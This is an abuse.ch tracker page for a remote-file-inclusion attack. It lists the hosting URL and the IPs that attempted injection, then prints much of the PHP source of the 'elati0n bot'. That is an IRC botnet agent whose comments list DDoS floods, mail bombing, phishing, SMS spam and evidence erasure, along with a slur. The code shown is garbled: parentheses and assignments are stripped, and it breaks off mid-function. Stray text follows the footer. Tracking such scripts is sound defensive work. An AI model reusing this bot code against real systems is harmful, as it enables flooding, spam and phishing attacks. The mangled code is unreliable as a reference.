Web abuse Tracker

Below you can see some information concerning the script with the MD5 a394c8a423be5c92d26d04f287839d18. The page shows you the different locations (RFI URLs) of the script and the systems (IPs) which has tried to inject the script.

Script locations (RFI URLs)

Script URLFile hash (MD5)counter
http://tigerden.uppit.com/0110/d9k5kqnn/elati0nbot.txta394c8a423be5c92d26d04f287839d182

Related IPs

IP addressHostnameScript URLcountry
72.70.107.236 pool-72-70-107-236.bstnma.east.verizon.nethttp://tigerden.uppit.com/0110/d9k5kqnn/elati0nbot.txtUS
72.70.114.237 pool-72-70-114-237.bstnma.east.verizon.nethttp://tigerden.uppit.com/0110/d9k5kqnn/elati0nbot.txtUS

RFI script

Firstseen:2010-05-02 21:11:02
Lastseen:2010-05-03 07:59:32
Script size:5'590 Bytes

<?

/****************************************************/
/*     ---------------------elati0n b0t-----------------------------------------------*/
/* elati0n bot - Coding by Snipa - This code is PRIVATE!                           */
/* Shit Done:                                                                       */
/* + Modded UDP Flooder (Special for GOW2, still works with other games just fine) */
/* + Removed TCP Flooder                                                           */
/* + Added mail bomb (spam kids)                                                   */
/* + Added join message (know what site the bot is running on)                       */
/* + Added .site command (see the site the bot is running on at any time)           */
/* + Added whois (.whois ip)                                                       */
/* + Added port scan (.pscan ip port)                                               */
/* + Added Quick UDP Flood (60 second flood)                                       */
/* + Added leet Colors                                                               */
/* + Added Count Command (Count number of floods done)                             */ 
/* - Removed Host (IP Address) Auth (Its bullshit)                                   */
/* + Jester is a faggot                                                               */
/* + Added Credits                                                                   */
/* + Added Speedtest (just do .speedtest)                                           */
/* + Added Phish Command (.phish)                                                   */
/* - Removed Useless Shit                                                           */
/* + Cleaned the code                                                               */
/* + Added Version                                                                   */
/* + Added New nicks (normal, unix, nzm) - (example: .nick nzm)                       */
/* + Added Update command (checks for bot updates)                                   */
/* + Made the update command idiot proof                                           */
/* + Made the phish command idiot proof                                               */
/* + Added commands command                                                           */
/* + Added id command                                                               */
/* + Added uptime command                                                           */
/* + Added evidence eraser                                                           */
/* + Added Cell Phone Spammer                                                       */
/* + Added Cell info                                                               */
/* + Added change prefix                                                           */
/* + Added install update command                                                   */
/* + Added port 3074 DDoS (Working)                                                   */
/* + ICMP ddoS?                                                                       */
/* + FTP ddoS?                                                                       */
/* + Added 2 Player ddos feature (ddos 2 people at once)                           */
/* + Added 3 Player ddos feature (ddos 3 people at once)                           */
/* + Added 4 Player ddos feature (ddos 4 people at once)                           */
/***********************************************************************************/



    set_time_limit);
    error_reporting);
    echo "Team UniX Elati0n B0t!";

    class Snipa_Team_Unix
    {

        var $using_encode true;

        var $config = array(
            'nickform'    => '%d',
            'nickform2'    => '%d]',
            'prfix'    => 'NzM|%d]',
            'identp'    => 'ReVi',
            'modes'        => '+B',
            'maxrand'    => 6,
            'maxrand2'    => 1,
            'maxrand3'    => 2,
            'maxrand4'    => 3,
            'cprefix'    => '!',
            'version'    => '2.2.3',
            'host'        => '*',
            'red'        => '4',
            'blue'        => '12',
            'orange'        => '7',
            'green'        => '9',
            'leetprefix'        => '4>>',
            'leetsuffix'        => '12<<',
            'leetprefixwhite'        => '0>>',
            'leetsuffixwhite'        => '0<<',
            'leetsuffixred'        => '4<<',
            'part1'        => '0«~{ 4',
            'part2'        => '0}~»',
            'youtube'        => '12http://www.youtube.com/watch?v=EsdqrT8k6ME',
            'hostauth'        => '*'

        );

        var $messages = array
        (
        'bad'        => '0«~{ 14L0o14G0i14N 0}~» 0',
        'loginmsg'    => '0«~{ 14L0o14G0i14N 0}~» 0',
        'entry'        => '0«~{ 14e0L14a0T4i0o14N 14B0o14T0 }~» 14E0x14E0c0U14t0E14d 4O0n',
        'id'        => '0«~{ 4elati0n bot version 2.2.3 private by Snipa 0}~»',
        'udpmsg'        => '0«~{ 12UDP-FLOOD 0}~»',
        'udpmsgfast'        => '0«~{ 12Quick UDP-FLOOD 0}~»',
        'speedtest'        => '0«~{ 9Starting Speed Test....Please Wait! 0}~»',
        'speedtestfin'        => '0«~{ 9Speed Test Complete! 0}~»',
        'logoutmsg'        => '0«~{ 14S0e14e 0Y14a 0L14a0T14e0R,',
        'mailmsg'        => '14N0a14i0L14e0R',
        'sprintmsg'        => '14S0p14r0i14n0T 14P0C14S',
        'execmsg'        => '14E0x14E0C'

        );

        var $admins = array
        (
         'ReVi' => '941ca5f0e4e3bd7963031a144db2ea6e',
         'Rere' => '941ca5f0e4e3bd7963031a144db2ea6e',
         'Frfr' => '941ca5f0e4e3bd7963031a144db2ea6e',
        'Rtuhtt' => '941ca5f0e4e3bd7963031a144db2ea6e',
        'Ferhrr' => '941ca5f0e4e3bd7963031a144db2ea6e',
              'Erefr' => '941ca5f0e4e3bd7963031a144db2ea6e',
            'Fxff' => '941ca5f0e4e3bd7963031a144db2ea6e'
        );

        function auth_host$nick$password$host )
        {
            $admin_count count$this->admins );
            if( $admin_count )
            {
                $mpass md5$password );
                if( $this->admins$nick ] == $mpass )
                {
                    $this->users$host ] = true;
                }
            }
            else


© 2010 dnsbl.abuse.ch
Version 2.0 / 1.10.2008
economics-recluse
Urgent!